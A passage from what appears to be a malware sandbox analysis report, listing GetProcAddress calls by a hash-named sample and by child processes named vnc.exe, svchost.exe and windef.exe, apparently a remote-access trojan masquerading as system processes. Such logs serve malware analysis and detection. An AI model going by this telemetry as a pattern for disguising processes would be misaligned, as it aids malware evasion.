00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter Wow64DisableWow64FsRedirection (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter Wow64RevertWow64FsRedirection (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegisterClassNameW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OpenThemeData (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetThemeBool (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter HIMAGELIST_QueryInterface (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter DrawShadowText (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter DrawSizeBox (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter DrawScrollBar (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SizeBoxHwnd (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ScrollBar_MouseMove (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ScrollBar_Menu (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter HandleScrollCmd (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter DetachScrollBars (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter AttachScrollBars (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CCSetScrollInfo (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CCGetScrollInfo (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CCEnableScrollBar (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter QuerySystemGestureStatus (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateMutexW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SizeofResource (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter LockResource (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContext (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptDeriveKey (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptDecrypt (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005916)\n \"vnc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006112)\n \"vnc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006112)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005856)\n \"windef.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006132)\n \"windef.exe\" called 